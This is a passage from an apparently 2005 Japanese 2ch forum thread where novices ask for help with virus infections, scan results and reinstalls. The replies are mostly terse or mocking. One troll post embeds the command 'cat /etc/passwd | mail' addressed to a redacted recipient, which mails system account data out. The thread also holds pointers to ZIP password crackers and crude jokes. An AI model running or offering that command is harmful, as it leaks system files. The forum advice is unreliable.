ましてくれれば」とも思ってるんだけど・・・。

ところで、この「TSPY_LINEAGE.PJ」によってネット（CATV）に繋が
らなくなることってあるんでしょうか？IPCONFIG見ると、いっけん
ネットワークの設定は問題ないように見えるけど。。。これは
ウイルスとは全く関係ない問題なのでしょうか？

質問用テンプレには該当しないのでこのままでよろしくお願いします。
Download板ではすれ違いだと言われこちらに来ました。


拡張子が書庫ファイルや動画ファイルや音楽ファイルや画像ファイルでも
ウイルスを埋め込むことはできますか？
以前、埋め込まれたウイルスのコードを実行するmp3や同様にjpgもあるって聞いたんですが
これはWindows標準のビューアやプレイヤを使わなかったり
Windowsのアップデートで回避できたりしますか？

あとexeやbatやcomなどの拡張子をzipとかmpgとかaviとかjpgに変えても実行されませんよね？
それとも親切なあーカーバやビューアなどが勝手に本当の拡張子を解釈して実行しやがりますか？


あと、>>1の点プレサイトが下のほうがなくなっていたのですが、移転先とかはどこでしょうか？

>>246

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　う〜ん、どうも最新のTrojanみたいだね。
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

漏れならCDブートで消すけどね。漏れの場合は、Bart PE作成してある。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>247 手法としては、拡張子偽装やバインディングなどじゃない？
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

あとは、セキュリティーホール利用とかかなァ。よく知らない。
アンチウイルスやアンチスパイウエアの補完として、ProcessGuardみたいなやつを
入れとくといいんじゃない。漏れは、そのFull Versionの方を使ってます。

最近2chﾌﾞﾗｳｻﾞで閲覧してて土日の12:00になると、Bloodhound.Expilot.6ってウイルスに感染します。
シマンテックのウイルス辞典には6は載ってなかったんだけど、新種なのかな？

>>250

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　ヒューリスティックスキャンに引っかかるんじゃないの？
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）
　
確認は必要だと思うけど、たぶん違うと思う。「12:00になると」なんだから、
サーバー上のプログラムか何かが関係してるのでは。
既知のことなのかどうかはしらない。

質問させていただきます。
最近 NECのパソコンを買ったんですが、マカフィーウィルススキャンと、パーソナルファイアプラスがプレインストールされていました。
これって更新にいくら位かかりますか？

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　Googleってみた？　出てなかった？
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

　 ∧＿∧
　（　´ A｀）　＜君、最近ナイ〜スじゃん　
　（　　　　）　　
　｜ ｜ ｜　　
　（_＿）___）

スパイウエアかと思い駆除したくてやったのですが
2つのソフトを実行したあとで勝手に開いてしまいます。
ウィルスが原因ではないのでしょうか？

【使用OS】 windowsXPHomeEditon
【WindowsUpdateしてるか】 してます。
【AntiVirusは何を使っているか】 ノートン2003
【ちゃんとUpdateしてるか】 してます。
【スキャンした結果（ウイルス名・発見場所）】 みつからないです。
【症状を具体的に、分かる限りすべて書く】
ttp://www.shop-savings.com/normal/yyy102.html
ttp://www.searc-h.com/normal/yyy65.html等
勝手にページが開いてしまいます。
【何をしたらそんなことになったのか】 不明。
【これまでにとった措置】
SpybotとAd-awareSEやってみました。

すみません…
2つのソフトを使ったあとでも開いちゃうんです。でした…

>>255
帰れ　リカバリー

あげ

>>251
改めて検索したら別名でのってました。対処法も載ってたんですけど未然に防ぐことって出来ないんですかね？

【使用OS】 xp
【WindowsUpdateしてるか】不明
【AntiVirusは何を使っているか】avg使用
【ちゃんとUpdateしてるか】 不明
【スキャンした結果（ウイルス名・発見場所）】
May be infect by unknown virus exploit
こんなのが出てきた。ファイルはjpeg
【別のオンラインスキャンしたならその結果は】やってない
【症状を具体的に、分かる限りすべて書く】 このファイルを削除したいのだが見つからない
【何をしたらそんなことになったのか】 不明
【これまでにとった措置】 三回スキャンして三回とも同じのが出てきた。
【その他の質問】

お願いします

>>260

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　えっ、？　何でアップデート関連不明なの？
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

PCのPはPersonalなんでしょ。自分で管理するものなんでしょ？
とりあえず、他社のオンラインスキャンを利用したら。
JPEGが引っかかってるのは、Malwareの生成物だからなんじゃないの。
よくわからん。

>>261
すみません
PCが知り合いのPCなのでかなり管理お粗末なんで・・・
他社の使ってみます
あとわかったことはJPEGファイルの場所で
Temporary Internet Filesの中にありました

インターネットオプションでクッキー、履歴、オフラインコンテンツ等を
削除すればおｋですか

>>260
そんなパソコン　殺しとけ

>>263
お怒りごもっとです。
知り合いにきつく言っときます

その知り合いは鏡の向こうに居た

メッセなんすよ・・・

>>255
つ[Hijack This]

>>227ですが、まだ解決しません。
知ってる方居ましたらどうかレスお願いしますｗ

>>268
丸ごと捨ててみたら？

>>268
どうしてもパスが調べがつかないようなら、ダメもとで
pikazipとか、全数検索でzipのパスを調べてくれるもので
パスワード解析してみてはいかがでしょう？

>>269
デスクトップにあったファイルが詰まってるので捨てるわけにはいきません 汗

>>270
pikazipも使ったんですがパス見つかりませんでした。一体どうすれば・・・。

>>271

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　Directory Traversal Bulnerability
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

http://cowscorpion.com/file/ZIPPasswordFinder.html

http://www.altech-ads.com/product/10000996.htm

so,Good Luck!!

>>272
ありが�d
早速試してみます

age

ぬるぽに感染した場合どうすればイイですか？
XPでｳｲﾙｽﾊﾞｽﾀｰつかってるんですが

>>275
まずこのスレのログをよく読むんだ。
そうすればテンプレを読まない奴がどう対応されるか理解できる。

【使用OS】　XP SP2 home
【WindowsUpdateしてるか】　している
【AntiVirusは何を使っているか】　AVG Free ・BitDefender Free
【ちゃんとUpdateしてるか】　している
【スキャンした結果（ウイルス名・発見場所）】
AVGでは検出されず、BitDefenderで検出
ウィルス名　Trojan.Downloader.Small.BKE
発見場所　　C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\ODSNSFCB\124042[1].exe
　　　　　　　　C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\XPZ0J2UV\121652[1].exe
【症状を具体的に、分かる限りすべて書く】　なし
【何をしたらそんなことになったのか】
該当ファイルのプロパティを見たところThemexp.org・「作者名」
という記述があったことからすると、2日前に
ttp://www.themexp.org/listings.php?type=vs&view=date
で、ある作者のVisual Styleを閲覧orダウンロード？（DLフォルダに該当ファイルがない
のでDLしたかはっきりしない。）したときに感染したと思います。
【これまでにとった措置】
BitDefenderでは削除できなかったので、該当ファイルを直接削除。
その後、BitDefenderで再スキャンしたところ検出されませんでした。
【その他の質問】
Trojan.Downloader.Small.BKEで検索しても完璧にマッチする情報を
得ることできませんでした。（能力不足かも。何語かよくわからないページはhitした。）
そこで、Trojan.Downloaderで検索すると、この種のウィルスは多くのウィルスと
同じ様にsystemフォルダやスタートアップに自らをコピーするようですが、
それらが検出されなかったのでこのままリカバリーせずに使い続けても大丈夫でしょうか？
わかりずらいかも知れませんが、自分の能力で分かる限り補足しますので、
どうぞアドバイスをよろしくお願いします。

>>277
オンラインスキャン

>>277
ウィルスバスター製品版で駆除

>>278-279
レスありがとうございます。
オンラインスキャンをしました。

【シマンテック】
2chのdatファイルが感染と表示されましたが、
これを無視すると何も感染していませんでした。
もちろんTrojan.Downloader.Small.BKEも見つかりませんでした。

【トレンドマイクロ】
何も感染していませんでした。

一応、FWのログを2時間分ほど見ましたが
怪しい通信もないようです。
こんな感じだったんですが、駆除が成功した。もしくは、
誤検出だったと考えていいんでしょうか・・・？

>192
その方法で直りました。ありがとうございました。

>>280
問題ない

>>277
そのサイトのThemeすべてにTrojan.Downloader.Small.BKE反応有り。
出所はそこで確定。
ウイルス発動の引き金はThemeインストール中の左下隅のチェックボックス。
これのチェックを全部外せばレジストリの書き換え等は発生しない（と思う）。
ウイルスと言うよりアドウェア、スパイウェアの類かと。

>>282
ありがとうございます。・・・○|￣|＿

>>283
やはりそうでしたか。
少し気になりますが、現状では何も問題がないのでこのまま使っていこうと思います。
わざわざ検証して頂いてありがとうございました。
お陰で安心する事ができました。・・・○|￣|＿

.exe 踏んでもうたorz
OSリカバリすっかのー。

最近OSリカバリがそれほど苦痛でない自分がいる。
バックアップだけはマメにしよう。

リカバリなんて1-2年毎でいいじゃないか

何かに感染しているのか、感染していないのかを自分で確実に判断出来るようになるまでは、
システムに不安があるような場合にはリカバリーした方がいいに決まってる。
これで、あらゆる不安から解消される。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　System Partition Image Backup
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

208ですが、もう一度質問させて下さい。
よろしくお願いします。

【使用OS】WindowsXP　SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】　ソースネクスト　VS
【ちゃんとUpdateしてるか】してます
【スキャンした結果（ウイルス名・発見場所）】シマンティックで調べた所、ウィルスなしでした。
【別のオンラインスキャンしたならその結果は】 トレンドマイクロでも、なしでした。
【症状を具体的に、分かる限りすべて書く】　｢ａ・ｂ・ｎ」を押すと、nbA}}}}} 、
　　　　　　　　　　　　　　　　　　　　　AAAAA、 }}}}}}}、 んbA｣｣｣｣｣などど、
　　　　　　　　　　　　　　　　　　　　　訳のわからない文字が続いて出てきます。
【何をしたらそんなことになったのか】　なぜそうなったのか、全くわかりません。
　　　　　　　　　　　　　　　　　　　自分専用のパソで、怪しいサイトには行った事はありません。
【これまでにとった措置】 スキャンデスク、キャッシュとクッキーの削除、ディスククリーンアップ

>>290
キーボードドライバを削除して再起動

Antivirus Version Update Result 
AntiVir 6.32.0.6 11.07.2005 no virus found 
Avast 4.6.695.0 11.07.2005 no virus found 
AVG 718 11.03.2005 no virus found 
Avira 6.32.0.6 11.07.2005 no virus found 
BitDefender 7.2 11.07.2005 no virus found 
CAT-QuickHeal 8.00 11.07.2005 (Suspicious) - DNAScan 
ClamAV devel-20050917 11.07.2005 no virus found 
DrWeb 4.33 11.07.2005 BackDoor.PcClient 
eTrust-Iris 7.1.194.0 11.08.2005 no virus found 
eTrust-Vet 11.9.1.0 11.07.2005 no virus found 
Fortinet 2.48.0.0 11.08.2005 no virus found 
F-Prot 3.16c 11.07.2005 no virus found 
Ikarus 0.2.59.0 11.07.2005 no virus found 
Kaspersky 4.0.2.24 11.08.2005 no virus found 
McAfee 4622 11.07.2005 no virus found 
NOD32v2 1.1278 11.07.2005 a variant of Win32/PcClient 
Norman 5.70.10 11.07.2005 no virus found 
Panda 8.02.00 11.07.2005 no virus found 
Sophos 3.99.0 11.08.2005 no virus found 
Symantec 8.0 11.07.2005 no virus found 
TheHacker 5.9.1.030 11.07.2005 no virus found 
VBA32 3.10.4 11.06.2005 Backdoor.Win32.PcClient.en
VB2005 2.933.00 7.510-1002 檢知せず

ログを見ると
218.18.50.97:8011
219.134.35.128:8011
宛てに（10秒おき）送信を試みる。

>>292
ログじゃなくて送信しているプロセスを調べてくんろ

>>293
すまんこ。

送信元は
C:\Program Files\Internet Explorer\IEXPLORE.EXE
となっているがタスクマネージャやProcess Explorer(www.sysinternals.com)には
表示されず。
で、レジストリエディタと睨めっこしていたら
「Ycxtlupv」いう怪しいサービス名を発見。
他にもRPCのエントリにServiceDll="%SystemRoot%\system32\Ycxtlupv.dll"
なんてものがあったのでYcxtlupvで検索して該当するエントリを削除or初期化し再起動。
なんとか止まった？
VB2005 のCPR 2.934.04 で検索しても反応なしですた。

どなたか>>218お願いします(；´д｀)

***** 個のファイルをスキャンしたところ、 6 個の感染ファイルが検出されました。
D:\BBS Logs\Logs\2ch\案内\PC初心者\1126885968.dat は　Bloodhound.Exploit.6 に感染しています。
D:\BBS Logs\Logs\2ch\外部板\Jane総合掲示板\1119683428.dat は　Unix.Penguin に感染しています。
D:\BBS Logs\Logs\2ch\ネット関係\セキュリティ\1003882448.dat は　VBS.LoveLetter.A に感染しています。
D:\BBS Logs\Logs\2ch\ネット関係\セキュリティ\1027753135.dat は　Unix.Penguin に感染しています。
D:\BBS Logs\Logs\2ch\ネット関係\セキュリティ\1130538758.dat は　VBS.LoveLetter.A に感染しています。
D:\BBS Logs\Logs\2ch\カテゴリ雑談\ヒッキー\subject.txt は　Unix.Penguin に感染しています

こんなん出ました

>>294
どこで手に入れて、何をして感染したの？
それが分からないとこっちも恐いぜ。

>>296
>こんなん出ました

よかったですね

>>227、>>268ですが、結局解決しませんでした。パスは英語じゃないかも。
自力で探すのは無理なようなので、最後にここで聞いてダメだったら諦めます。
誰か知ってるかたいませんか〜・・・・・？

>>299
ん〜、いい加減、ちっとひつこいかも。
パスは英語じゃないって、だったら、日本語辞書探せばええやん。
pikazipの日本語辞書とか、自分で探したの？
漢字の辞書とか、ぐぐれば出てくるよ。

>>300
ごめんなさい、日本語辞書なんてあったんですね；；
しかし早速やってみましたがダメでした。
まだ何か方法ありますかね・・・・

無い！！

>>291
ありがとうございます。
先程、キーボードドライブの設定をやり直してみたのですが、
まだ直っていないようです。
オンラインスキャンしても、悪いところはないし、
一体どうしたらよいのか・・・

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜ >>303
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

「A」キーの横列の対岸が｝や」になってるよね。キーボード入力は
基本的にマトリクスセンシングになってるんだ。スキャンコード出力の
問題ではなくて、内部のハードトラブルのような気がする。

IPアドレスってばれたらどうなるんですか？
あとばれた時の対策をおしえてください。

おまいの悪行が全部ばれて逮捕されるぞ。
ばれたらすぐ山に逃げるんだ、山に！

　　　　　　　　　　　　　　　　　　　　　cat /etc/passwd | mail [email protected]
　　　　　　　　　　　　　　　　　　　http://bubble4.2ch.net/test/read.cgi/nendai/1128605930/
　　　　　　　　 ∧ ∧
　　　　　　　　(・∀ ・) 　＜遠慮なく収めてくれ。　礼など要らぬ....。
　　　　　　　　<(　　)v　　　　　ｲｪｰｲ!!

>>305
串･Proxy･IP関連スレッド Vol.35 (パソコン初心者＠2ch掲示板)
http://pc7.2ch.net/test/read.cgi/pcqa/1123286827/

age

ウイルスが混入している圧縮ファイルを手動でスキャンした時、
ノートンなら圧縮フォルダ内のウイルスを駆除できるのですが、
ウイルスバスターなら駆除できず、隔離されるのはなぜ？？

>>310
仕様

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　 >>311 乙 !!
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

初めてウイルスに感染したみたいですが
駆除フリーソフトをダウンロードして
駆除したつもりなんですが
まだ安定しません。

ウインドウズXP
OSと一番新しいの
だと思います。

それ以外詳しいことはわからないのですが

思い当たるところは
どうもメモリ部分に感染している
いつもクリック部分に砂時計のようなものが表示される
HPの画像が見れなくなる

大体こんな感じです

思い当たるウイルスを教えてください。

>したみたいですが
>つもりなんですが

　　多分、誰も答えないだろうな・・・

初心者なので書き方変だったらすいません
ほんとちうに昨日からおかしいのです
時計が消えないのです

>>313
ブルースウィルス

どう見ても映画俳優です。
本当にありがとうございました。

>>315
いろいろ訊いていって修復する方法もあるけれど
こっちが質問しても答えがわからんだろ？

　おとなしくリカバリーしようや。

ttp://virus.org.ua/unix/woid.jpg
これを踏んでしまいました。重くなり始めてから慌ててLANを引っこ抜いたのですが
どんなウィルスが入っているのでしょうか？
今トレンドマイクロで検索中です。

オンラインスキャンの結果、ウィルスは見つかりませんでした。
トレンドマイクロのスキャンで引っかからないウィルスとかトロイとかってありますか？

>>320
Operaで開いたらウイルスバスター2006がコレ隔離した。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_CRINET.A
あとは自力で対処汁。

>>321
LAN引っこ抜いたら「telnetに接続できません」って出たのは
これのことだったのですね。
先ほどのオンラインスキャンで引っ掛からなかったのは何故でしょう･･･。
もう一度スキャンして引っ掛かったら削除します。
ありがとうございました。

http://www.grannymax.com/index1.shtml

これを踏んでしまった後ＩＥがおかしくなりました（ファイル保存とかできなくなるとか）
ＶＢ２００５ではなんのウイルスも発見できなかったんですがどーすればいいでしょうか？

>>323
そんなわけあるか　タコが

いえ・・本当に・・・
WindowsUpdateはしてます
ＶＢ２００５も最新の状態なんですが検索してもなにも出てこないんです

そういうこともある
諦めろ

>>321
>>323

>>1
【　　最　　重　　要　　事　　項　　】
ウィスルやブラクラだと思われる物の直リンは厳禁！！！！！！！！！！
質問の時は頭の『ｈｔ』を抜いて貼り付ける事

ｽﾏｿ
間違えた

× >>321
○ >>319

突然落ちたり最新のシステム制御にやられた
Windowsうｐだてパッチ当ててればよかったorz

>>323
>>1見てから来い

DION規制で書き込めない・・・・・・・

ぜひお立ち寄り下さいね

http://alink2.uic.to/user/lets5go5.html

朝からavastで検査していまして
今時間やっとトロイの木馬を発見しましたと
メッセー時でましたが、削除できないみたいです。
よくわからないけど奥深くに進入していたのでしょうか。
昨日は4つ削除できていたけど、まだPCおかしかったので
やっと原因わかったって感度です。
フリーソフトで削除できるのないですか？

削除ボタン押そうとすると
ファイルが見つかりませんと出ます
詳細押したら
変な英語のページへ飛びました

Win32:Trojano-2062 [Trj]

これがウイルスでい。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜ >>313
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

えっと、マルチ(多重感染)の場合は、リカバリを推奨しますが。

即レスありがとうございます、そうなんですか・・。

画像ファイルもすべて処分が必須でしょうか

>>337
この際だから集めたロリペド画像は全部捨てたら
どうせネットで拾ってきたんだからまた手に入るって

いえって
うちのわんこたちの成長記録で絶対捨てたくないのです

Unhack Meで駆除しようとしていますが
何度再起動しても同じ名前のウイルスが出てきます

英語で
ハッカーディフェンダー
カタカナで
ルーレット

ハッカーディフェンダールーレットというウイルスが
駆除できない模様です。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>337
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

えっと、必要なデータ類はバックアップしといて、後で戻す時に
スキャンをかけて下さい。

モナーさんありがとうございます。

スキャンとはなにでしょうか？
無知ですみません。

ウイルス・スパイウェアの捜索

なんどもありがとうございます。Unhack Meでいくつかの木馬ウイルスは削除できたのですが
残りが消えません。
やはりデカバリーしか道は残されてないでしょうか。

>>343
デリバリーしろ

>>343
> デカバリー
デリバリーの間違いじゃない？

ばかやろうおまえら！>>313は釣りだ！>>339の「いえって」で気づけ！

正しくはデリバリー

ディスカバリー

デカメロン

若しくはカリクビー

いえすみません。
本当に初心者です。

とにかく目に付いたウイルス駆除は沢山取り入れて
今全開で調べていますが
なんか5000いじょうウイルスが見つかったみたいです・・。

今はアドウェアというのが見つかったと
サイレンが鳴って削除したところですが
またファイルが見つかりませんとでました。

それなら、なおさらカリクビー しなくちゃ

やっぱデリバリーみたいです。

とりあえず今はCDみたいなのに画像を移す作業しています

感染日は11/11でどうもライムウエアのファイルで感染した模様です。

ちゃんと避妊しないから

とりあえず
わんこ成長日記には感染はないみたいでした。

避妊したなかった私のミスです
安全日だったはずですが・・
変な韓国語みたいな文字のをダウンロードしたのですが
多分あれが犯人です。
皆さんも気をつけてください
これからも質問するけど教えてください。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　LimeWire　乙。
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

>>356
市ね

なんか153クリテツィカルと英語でてます。

今アドウェアで153見つかったトロイを駆除しました
多分消えた予感がします。

では一旦さようなら

どうもありがとう。

消えてない時はもう一度くるので色々教えてください。

あと>>331は別人でした
すいません
ただしくは
>>311でした。

さような。

>>311も間違いで

>>313が私でした。

すいてませか。

ク
　リ
　　ト
　　　リ
　　　　ス

>>353
ＣＤ−ＲＷドライブが無くて、ＣＤ−ＲＯＭドライブで焼いたけど無理だった。
ってのは無しな。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　チェンジアップ　乙。
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

最近流行ってるというかバラ撒かれてるbravehostみたいなアドレスの、
ニュースソースに偽装したアドレスを誤って踏んでしまったんだが、ただのブラクラ？

念のためウィルススキャンとSpybotのスキャンかけておいたんだが。

>>362
最近まで変更できなくてRWしかコピーできないと思っていましたが
色々弄くっているうちにRにもコピーできるとわかり
コピーしました。
入れたウイルス検査ではわんこ成長日記は無事通過しました。


しかしトロイの木馬は難儀ですね。
除去してるのに
まだまだウイルスでてきますよ。
まるでどんぐりの背比べですね。

でもなんか前よりは安定した感じですね。

早めにデリバリー推奨。

てか回線抜いてるよね・・・・　？

回線抜いてるの意味わかりません
すみません。

なんか殆ど除去できた感じですが
Maruなんたらってのが、ad-Awareでも消えないみたいで
何度やっても残ってます。

仮にウイルス全部消えたらデリバリーしてなくていいんですか？

>>368
「ウイルス全部消えた」と確信が持てるのならデリバリーしなくていいんじゃない？
でもたいていの人はデリバリーすると思う。
PCに長けている人ほど、デリバリーの重要さを知っている。

ありかせとうこせさせいます。、親切に

わかりました
明日ちょっとしてみます。

感染したファイルに対するノートンの適用した処理に「アクセスが拒否されました」
というのががあるんですが、具体的にどういった処理なんでしょうか･･･？

処理として不十分(問題未解決)なのか、隔離・検疫にあたる処理(問題解決済)なんでしょうか･･･
因みに、感染場所はインターネット一時ファイルなんですが。。。

失礼、誤爆ですorz

友達のＰＣがおかしくなりました。
正常に戻す方法があれば、教えてください。
【使用OS】 ＸＰ
【WindowsUpdateしてるか】 していない
【AntiVirusは何を使っているか】 使っていない
【ちゃんとUpdateしてるか】 していない
（テンプレ中略）
【症状を具体的に、分かる限りすべて書く】 今日突然ネットにつなげなくなった。
最近、英語のメールがたびたび来ていたらしい。
メールはエクスプローラで受信。
さっき、ついにＰＣ自体がうまく立ち上がらなくなったらしい。
具体的には、起動時に[SONY（中略）ご迷惑をおかけしています（後略）]
みたいな表示が出て、そのあと、普通にWIN旗の画面になったあと、
真っ黒なウィンドにポインタだけがでるだけになってしまったとのこと。

【何をしたらそんなことになったのか】
よくわからない。通常の使用方法は、JPOPのレンタルＣＤをウィンドズメディアプレーヤ
や、i-Tunesでハードディスクにおとしたり、
ヤフオクで出品・購入など。

【これまでにとった措置】とくになし。
　

【その他の質問】
どうしたら、きちんと起動できるでしょうか？
ウィルスの仕業でしょうか？
リカバリＣＤで復旧可能ですか？
もっと良い復旧の方法はありますか？
　
初心者です。よろしくおねがいします

>>373
初心者は全員リカバリー

素早いお返事ありがとうございます
リカバリーＣＤでまたＰＣつかえるようになるものですか？
リカバリＣＤでもだめな可能性もありますか？

>>375
やってから聞きやがれ

ですよね。
やってみます。
すいませぬ

>>377
諦めて明日一緒にデカバリーしましょうよ

>>378
私にレスしないでください。
なんか馬鹿にされてるみたいでいやです。
本当に困ってる人に失礼ですよ貴方。

>>373
>【AntiVirusは何を使っているか】 使っていない

ふざけてるんですか？

>>378
「回線抜け」　ってのはあなたのパソコンに侵入しているワームが自己増殖して
ネット上に送信されるのを防ぐ為なんですが・・・

釣り？

（　＾３＾）≡○#) ３・）∴.;

いまリカバリＣＤでリカバリしようとしたらしいのですが
うまくいかなかったみたいです。
あす、直接様子見に逝ってみます。
　
>>375＝>>373＝>>377＝私ですが
私は>>379ではないのですが、、、？
うぅん？

>>380ふざけてるつもりは無かったみたいですが
まぁ、事実なんで、なんとつっこまれてもしょうがないです。
笑ってあきらめるしかなさそうです。

（　＾３＾）≡○#) ３・）∴.;

おはようございます。

>>380
IP電話です。
ネットつないだら危険ということですか？

トロイの木馬殆ど除去できたのですが
まだウイルス残っていて、それがいくらやっても消えないのです・。

Maru-listというやつです。

なんかやっぱ完璧に消えてないなら増殖してるぽくて
今朝新たにウイルス見つかりました
もうデリバリーしか道はない。

SONY BMG採用のCDコピー防止技術「XCP」
Microsoftが各種マルウェア対策ソフトウェアで
駆除を予定していることが明らかになった。
ttp://www.itmedia.co.jp/news/articles/0511/13/news003.html

【使用OS】 XPSP2
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 昨日したとこ
【スキャンした結果（ウイルス名・発見場所）】
PE_PARITE.A-1が主にDocuments and Settings内のtempフォルダから検出
PE_PARITE.Aはexeファイルに多数検出
【別のオンラインスキャンしたならその結果は】 同じ
【症状を具体的に、分かる限りすべて書く】
下の「措置」をしたらセーフモードでは起動するのに
通常モードで起動したらユーザ選択後、
設定している壁紙が表示されるだけでタスクバーやアイコンは表示されない。
タスクマネージャーは起動できる模様。
【何をしたらそんなことになったのか】
昨日のウイルススキャンで発見したがいつ入ったかは････
【これまでにとった措置】
トレンドマイクロに載っている削除方法を試してみた。
スキャンで出てきたPE_PARITE.A-1を全て削除し、
セーフモードでレジストリのPINFも削除。
その後に再起動したら上の症状になった。
その上、何度削除してもtmpファイルが別名で作成されるのが困るorz

とりあえずタスクバーやアイコンを表示するにはどうすれば良いでしょうか。
アドバイスお願いしますorz

　 /＼＿＿_／＼
／　⌒　　　⌒ ::: ＼
|　（●）,　、（●）、　| 　　 ／￣￣￣￣￣
|　　,,ノ(、_, )ヽ、,, 　 | 　＜　>>387
|　　　ト‐＝‐ｧ' 　 .::::| 　　 ＼＿＿＿＿＿
＼　　｀ニニ´　 .:::／
／｀ー‐--‐‐―´´＼


いや、たぶん、文章長いんで、みんな読むのがめんどくさいんだと思う。

>387
オメーよ？
＞PE_PARITE.A
はwinnyやってないと感染しないはずなんだが。
自分でなんとかしなさい。

>>387
exeを実行する時には最低でもレジストリの変更点は監視していないとね。

>>387
リカバリマジオススメ

フォルダ偽装のトロイ（Torojan Horse)をうっかり踏んでしまいました。
解凍前にノートン（定義は最新です）でスキャンしたときには探知できませんでした。
踏んだ後、ノートンのアクセスが拒否され、削除できないと表示されました。

その後のシステムスキャンやオンラインスキャンではなにも検出されず、
今のところ目に見える被害もありません。

心配なのでリカバリすることにためらいはないのですが、
感染時に接続していたUSBメモリや外付けのＨＤの中身も
あきらめたほうがよいのか判断しかねています。
上記のように、ノートンで事前に探知できなかったので、
リカバリ後に外付けのものからの再感染が心配なのですが、
大丈夫なのでしょうか？

【使用ＯＳ】WindowsＸＰ　ＳＰ１
【WindowsＵｐｄａｔｅしてるか】ＳＰ２以外はしてます
【AntiVirusは何を使っているか】avast!4 HomeEdition + BitDefenderFreeEdition
【ちゃんとUpdateしてるか】してます（というか自動ｱｯﾌﾟﾃﾞｰﾄなので)
【スキャンした結果（ウイルス名・発見場所）】Win32:TipSea-E [Trj]　発見場所：C:WINDOWS\system32\rk.bin
【症状を具体的に、分かる限りすべて書く】これといって目立った症状はなし（なんか重い・・・とは思ったけども)
【何をしたらそんなことになったのか】system32フォルダなどいじくった覚えはありません。
【これまでにとった措置】該当ファイルの隔離

>>393
ｓｐ２にアップデートできないの？

＞通常モードで起動したらユーザ選択後、
＞設定している壁紙が表示されるだけでタスクバーやアイコンは表示されない。

ユーザーは管理者を選択してる？
新しいユーザーが作られてるんじゃないの？

スイマセン。ウインドウが勝手にいっぱいでてきて、外国のサイトに
繋がるんですが…。
勝手にショートカットまでできてます。
どう考えてもウィルスですよね？

>>396
とりあえず回線切っとけ・・・

まずは回線切ってPCの電源落とせ。
念のため電話とFAXとTVのコード抜いて
携帯やモバイル機器も電源切っておけ。
全部済んだら続きを質問しに来い。

ウイルス駆除をお店みたいなのでしてもらうときって、
お気に入りに入れてるものとか、消えますか？

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>396
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

どう考えてもスパイウエア系だよ。
チッチキチーなこと言ってたらだめだよ。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>399
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

場合によっては消されるかも。
Backupとっとけば。

OpenJaneDoe使っています。
セキュリティソフトはノートンです。
お気に入りで「年代別」にあるスレが6つあります。
それを、お気に入りのログ一覧でスレを見ようとしたらエラーになります。
その後、「年代別」の板を開けると、スレが見れるようになります。
ところが、「年代別」の板を閉じると、ウイルス警告が出ます。

ウイルス名　Unix.Penguin
ファイルは自動的に削除されました。

と表示されます。
この表示を出さないようにしたいのですが、どうすればよいでしょうか？
「年代別」の板にウイルスが貼り付けてあるのかな？

>>402
とりあえず>>10嫁。

質問ですがPDA用のウィルス対策ソフトってあるのでしょうか。

インターネットのサイトに入る前に、そのサイトにウイルスがあるか確認することはできますか？
学校の奴を使うので、ウイルスに感染すると、自己責任になってしまうんです。
他、何か注意しなければいけないことがあったら、教えて下さい。
よろしくお願いします。殆ど素人です。

>>405
ならこのスレ自体見ないほうがいいよｗ
このスレひらいた時点で感染するから

>>406
携帯でもですか？

>>405
確認することは難しいと思います。
怪しいリンクや,URLに行かなければ大丈夫だと思いますが。
ソースチェッカーなどを使えばブラクラ等確認することができます。

http://so.7walker.net/guide.php

すいません　マイラーダエモンって方からメールがきたのですが
ウィルスでしょうか？

それドラえもんみたいなもんだから気にしないでいいよ>>409

圧縮ファイルをスキャンしたらトロイの木馬が発見されたんですけど解凍してないから感染はしてないんですか？

>>411
解凍したって感染なんてしません

>>412
そうなんですか？初心者なんで全然分かんなくて…

>>409の元ネタはhttp://ex13.2ch.net/test/read.cgi/gline/1131170526/

>>408
ありがとうございます！気をつけてやりたいと思います！

マルチで向こうに質問中


ttp://pc8.2ch.net/test/read.cgi/sec/1130538758/459
459 ：名無しさん＠お腹いっぱい。 ：2005/11/15(火) 23:06:17
